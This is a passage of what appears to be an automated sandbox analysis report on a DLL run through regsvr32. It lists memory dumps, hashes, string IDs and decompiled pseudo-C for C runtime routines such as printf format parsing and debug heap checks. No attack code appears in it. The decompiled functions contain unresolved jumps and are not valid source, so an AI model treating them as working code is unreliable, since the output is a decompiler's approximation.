                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                • API String ID: 2123368286-348877268
                                • Opcode ID: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                • Instruction ID: 000baf689883631365c7c02d111a1b1a2de10ec58b0e6b3448400e9d2f0f3b8d
                                • Opcode Fuzzy Hash: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                • Instruction Fuzzy Hash: AE915C32E0CA428AE7A08B68E84476E77E0F394365F604625E7DD43AF8DB7ED544CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-4087627024
                                • Opcode ID: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                • Instruction ID: 7ef584807be417e268083fb343ad6d7be6558f6767769905c9ec51bf7eddb7ed
                                • Opcode Fuzzy Hash: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                • Instruction Fuzzy Hash: 61713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED541CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                • API String ID: 2123368286-3692278645
                                • Opcode ID: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                • Instruction ID: fae548ccfa44dfd2566f43a5020e02f413341588dce5173fb2663fa56b07ad66
                                • Opcode Fuzzy Hash: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                • Instruction Fuzzy Hash: 18515C31A1C64686F7A08B54E8447AE77E5F384344FA04136E6CD43AB8DBBEE545CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_base_malloc_base
                                • String ID:
                                • API String ID: 3824334587-0
                                • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                • API String ID: 2123368286-817335350
                                • Opcode ID: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                • Instruction ID: a7fd658f0f883f275d3cb6d605636d4d7d2232aae341650a7fa887ee8dadd8b1
                                • Opcode Fuzzy Hash: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                • Instruction Fuzzy Hash: 80610B36A18B4186EB64CB59E89132EB7A0F385794F714126EBCD83BB4CB3ED441CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                				intOrPtr _v24;
                                				long long _v48;
                                				long long _v64;
                                				intOrPtr _t21;
                                
                                				_a8 = _t21;
                                				_v48 = 0;
                                				_v64 = 0;
                                				_v24 = _a8;
                                				_v24 = _v24 - 2;
                                				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                				goto __rax;
                                			}








                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                • API String ID: 2123368286-2245755083
                                • Opcode ID: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                • Instruction ID: 64874b8661254a0ae2b01e5280f4eb25b6cc5e7b5243a42f7df21d474b3e4b39
                                • Opcode Fuzzy Hash: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                • Instruction Fuzzy Hash: 3871E83291C7868AE7A48B58E84436EB7E0F785754F214135E6CE47BA4DB3EE448CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapPointerValid
                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                • API String ID: 299318057-1988567080
                                • Opcode ID: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                • Instruction ID: 749e228a184b7b5abc50e7f522a6a47edf15a58a7031c3663ed602be408c8cc7
                                • Opcode Fuzzy Hash: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                • Instruction Fuzzy Hash: 28314D36A1864A85EBE48B59E84172E67D1F385784F714036EACD83BB5DB3FD440CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer$_realloc_dbg
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                • API String ID: 429494535-1858280179
                                • Opcode ID: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                • Instruction ID: d34c943794379c2c172b76bd65526e764d0d85b1982d09e34a5c92bdfa9d3ddf
                                • Opcode Fuzzy Hash: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                • Instruction Fuzzy Hash: 8141B836619A8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-734865713
                                • Opcode ID: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                • Instruction ID: a4401d07f2fb6cffb5d65cb91d5b1a1a6a6edb3a16c82fb832ec879f024f4c4f
                                • Opcode Fuzzy Hash: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                • Instruction Fuzzy Hash: 60D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6D987AA9DB7DE440CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}




                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 0-1585035072
                                • Opcode ID: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                • Instruction ID: 786758f90f15de6030b6b0b797e7a3976266de7f5bb6935df7b5cb31798ef030
                                • Opcode Fuzzy Hash: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                • Instruction Fuzzy Hash: D0B1FD7260CAC286E7B1DB55E8417AFB7E0F784356F104126EAC987AA9DB7DE440CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                • API String ID: 2123368286-1876092940
                                • Opcode ID: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                • Instruction ID: 67313c86c0907fb9479329b5879005a062486a8a0ba054e26d823845a12987d7
                                • Opcode Fuzzy Hash: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                • Instruction Fuzzy Hash: FA911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}




                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                • API String ID: 530996419-3826063230
                                • Opcode ID: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                • Instruction ID: 94b803b8bf2c9d0da31cb8fabbb810b13218eabd765851e9cd54d2cd97e7a3d8
                                • Opcode Fuzzy Hash: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                • Instruction Fuzzy Hash: 46915E72A0D6C28AE3F18B54E88477EB7E4E381346F601026D7CD87AA9CB7ED5418F11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}




                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                • API String ID: 530996419-4206863317
                                • Opcode ID: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                • Instruction ID: 3115a511369859e1f947b9f2c3204b19b7531d4cbd05c4b67493ff7b1ab56a73
                                • Opcode Fuzzy Hash: 7c5d23002966610aaf37fd2e87aab718b594dfcb558d5e32631a425086473698
                                • Instruction Fuzzy Hash: 5C910C62A0C6C18AE7F08B55E88077EB3E1F385756F600025E6CD87AA8DB7ED855DF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                				void* _t171;
                                				char* _t191;
                                				char* _t192;
                                
                                				_a968 = _a696 & 0x000000ff;
                                				if (_a968 == 0x20) goto 0xf9d3bd57;
                                				if (_a968 == 0x23) goto 0xf9d3bd64;
                                				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                				if (_a968 == 0x30) goto 0xf9d3bd72;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000004;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000001;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000002;
                                				goto 0xf9d3bd7d;
                                				asm("bts eax, 0x7");
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000008;
                                				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                				_t191 =  &_a1112;
                                				_a88 = E000007FE7FEF9D31E40(_t191);
                                				if (_a88 >= 0) goto 0xf9d3bdbc;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3bdd5;
                                				_a88 = _t171 + _t191 - 0x30;
                                				_a116 = 0;
                                				if (_a696 != 0x2a) goto 0xf9d3be16;
                                				_t192 =  &_a1112;
                                				_a116 = E000007FE7FEF9D31E40(_t192);
                                				if (_a116 >= 0) goto 0xf9d3be14;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3be2d;
                                				_a116 = _t171 + _t192 - 0x30;
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 530996419-4087627031
                                • Opcode ID: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                • Instruction ID: 3ab598f7b4fd695a8a70feaac4248e5f119f303646eea4bd5d4eba80b196619f
                                • Opcode Fuzzy Hash: 1de43203eafd45e9ce0d0d64285ee361cc766a04d488c37d7d0694f7340f7322
                                • Instruction Fuzzy Hash: F3514C72A0D6C28AF3F19B64E855BBEBBE4F381345F200126D2D9869A9D77DE540CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                				void* _t171;
                                				char* _t191;
                                				char* _t192;
                                
                                				_a1404 = _a1208 & 0x0000ffff;
                                				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000004;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000001;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000002;
                                				goto 0xf9d3dd2b;
                                				asm("bts eax, 0x7");
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000008;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                				_t191 =  &_a1560;
